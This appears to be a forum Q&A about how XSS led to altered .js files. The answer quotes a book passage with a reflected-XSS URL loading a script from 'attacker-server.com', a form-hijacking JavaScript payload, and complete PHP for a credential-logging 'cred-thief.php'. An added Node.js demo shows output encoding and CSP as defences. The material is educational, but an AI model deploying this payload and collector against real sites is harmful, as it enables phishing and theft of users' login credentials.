XSS attacks, how does it happen?

14

Recently a client has been the victim of XSS attacks. We treat all inputs that we encounter for faults, but I cannot understand how malicious JavaScript code was inserted into the .js files on the server.

How did they change the script via XSS?

asked by anonymous 28.03.2014 / 15:27

1 answer

15

The information below has been taken from the Hacking: The Next Generation book.

Content Injection Using Cross-Site Scripting (XSS)

Stuffing the entire XSS payload into a single URL string can be confusing and complicated. Most of the time, the attacker will have to deliver a complex payload to maximize the impact of the XSS attack. In such situations, the attacker can use external JavaScript files to hold the exploit payloads. This is done by injecting a script tag with a src attribute. The src attribute allows the attacker to specify an external JavaScript file to be executed in the context of the domain that hosts the web application vulnerable to XSS. When injecting a script tag with a src attribute into an XSS-vulnerable page, attackers often host the external JavaScript file on a web server that they control. A typical injection of an external script file using XSS would look something like this:

http://vulnerable-server.com/login.jsp?parameter="><script%20src="http://attacker-server.com/payload.js"></script>

When a reference to an external script is injected, the attacker has the option of storing the entire exploit payload in the external script file (in this case, the file at http://attacker-server.com/payload.js). In this example, the attacker uses the external JavaScript file to store the exploit code that scans the form objects of the login page and changes the form action so that the user's credentials are transferred to the attacker's web server. The following code shows the contents of the external JavaScript file payload.js:

for (i = 0; i < document.forms.length; i++) {
    var originalaction = document.forms[i].action;
    document.forms[i].action = "http://attacker-server.com/cred-thief.php?orig=" + originalaction;
}

This JavaScript payload enumerates all FORM objects, records the original FORM ACTION attribute, and changes the ACTION attribute to point to the attacker's web server. When the victim submits a form using the "Enter" button on the login page that is vulnerable to XSS, their username and password are passed to the cred-thief.php file on the attacker's web server. Once the attacker's web server receives the victim's credentials, it redirects the victim back to the original login page and automatically logs the victim in to the application, masking the fact that their username and password have been stolen. See the code for cred-thief.php:

<?php
// Is the orig parameter present?
if (isset($_GET['orig'])):

    // open the file for storing the stolen creds
    $fp = fopen("StolenCreds.txt", 'a');
    fwrite($fp, $_GET['orig'] . "\r\n");

    // Create the initial HTML for the FORM with the
    // original URL for the ACTION
    echo "<html><body><form name='redirect' id='redirect'";
    echo " action='" . $_GET['orig'] . "' method='POST'>";

    // Loop through all the POST parameters stolen from the
    // original site and generate the correct form
    // elements and log the value to a text file
    foreach ($_POST as $var => $value) {
        echo "<input type='hidden' name='" . $var ."' value='" . $value ."'>";

        fwrite($fp,"var:".$var."  value:".$value."\r\n");

    }

    // the log file only exists in this branch, so close it here
    fclose($fp);

    //complete the form and autosubmit the form using javascript
    echo "</form><script>document.redirect.submit()</script></body></html>";

else:
    //If orig is missing, redirect back to the referring site
    //($HTTP_REFERER was the old register_globals name; the superglobal
    // form is $_SERVER['HTTP_REFERER'])
    header( 'Location: '. $_SERVER['HTTP_REFERER']) ;

endif;
?>

XSS vulnerabilities in login pages can be devastating. For example, if a bank site has an XSS exposure anywhere in its domain, a sophisticated phisher will be able to use the XSS vulnerability to leverage SSL (including Extended Validation SSL) and to get past phishing filters. Such phishing pages will display fully legitimate SSL certificates and are undetectable by phishing filters, even though they contain phishing code. By using an XSS attack, as shown earlier, the potential phisher can steal the credentials provided to banking sites, circumventing all current phishing protection mechanisms.

I hope this text clarifies some of the procedures; for more information I recommend reading all of chapter 2 of the book.

28.03.2014 / 16:11
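Added example (not code from the book or from the answer above): a small Node.js model of the reflected injection in the login.jsp URL, with the vulnerable rendering next to an output-encoded one. The render functions, escapeHtml and externalScripts are hypothetical stand-ins for the server page and for the browser's tag parser; the attack URL is the one quoted in the answer. It makes concrete the point behind the question: the attack described by the book never modifies a file on the target server. The injected tag only makes the victim's browser fetch payload.js from the attacker's host, so if .js files on disk really did change, that points to write access on the server rather than to XSS.

```javascript
// Added example, not code from the book or the answer above.
// Models the reflected XSS from the login.jsp URL: a hypothetical server page
// that echoes the "parameter" query value into a hidden form field, once
// unescaped (vulnerable) and once HTML-encoded (hardened), plus a crude
// stand-in for the browser's tag parser to show what each version executes.

// Attack URL as given in the answer (the %20 is a URL-encoded space).
const ATTACK_URL =
  'http://vulnerable-server.com/login.jsp?parameter="><script%20src="http://attacker-server.com/payload.js"></script>';

// What login.jsp would receive: the decoded value of the "parameter" query key.
function parameterFromUrl(url) {
  return new URL(url).searchParams.get("parameter");
}

// Minimal HTML encoder for text nodes and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the query value is concatenated straight into an attribute, so
// a leading "> closes the attribute and the tag, and the <script> that follows
// becomes real markup.
function renderLoginVulnerable(parameter) {
  return '<form action="/login" method="POST">' +
    '<input type="hidden" name="parameter" value="' + parameter + '">' +
    '<input name="user"><input name="pass" type="password"></form>';
}

// Hardened: identical page, but the value is encoded for the attribute
// context, so the browser sees data, not markup.
function renderLoginHardened(parameter) {
  return '<form action="/login" method="POST">' +
    '<input type="hidden" name="parameter" value="' + escapeHtml(parameter) + '">' +
    '<input name="user"><input name="pass" type="password"></form>';
}

// Crude stand-in for the browser: collect the src of every <script> tag that
// appears as real markup. Encoded text such as &lt;script never matches.
function externalScripts(html) {
  const srcs = [];
  const re = /<script[^>]*\ssrc=["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) srcs.push(m[1]);
  return srcs;
}

// Run both renderings against the attack URL and report what would load.
function demo() {
  const injected = parameterFromUrl(ATTACK_URL);
  return {
    injected,
    vulnerableLoads: externalScripts(renderLoginVulnerable(injected)),
    hardenedLoads: externalScripts(renderLoginHardened(injected)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the vulnerable page loading http://attacker-server.com/payload.js while the hardened page loads nothing, for exactly the same request. Encoding per output context (attribute, text, JavaScript, URL) is the fix on the server side; a Content-Security-Policy whose script-src does not include the attacker's host is a second, independent layer that would stop this particular payload even if an encoding bug slipped through.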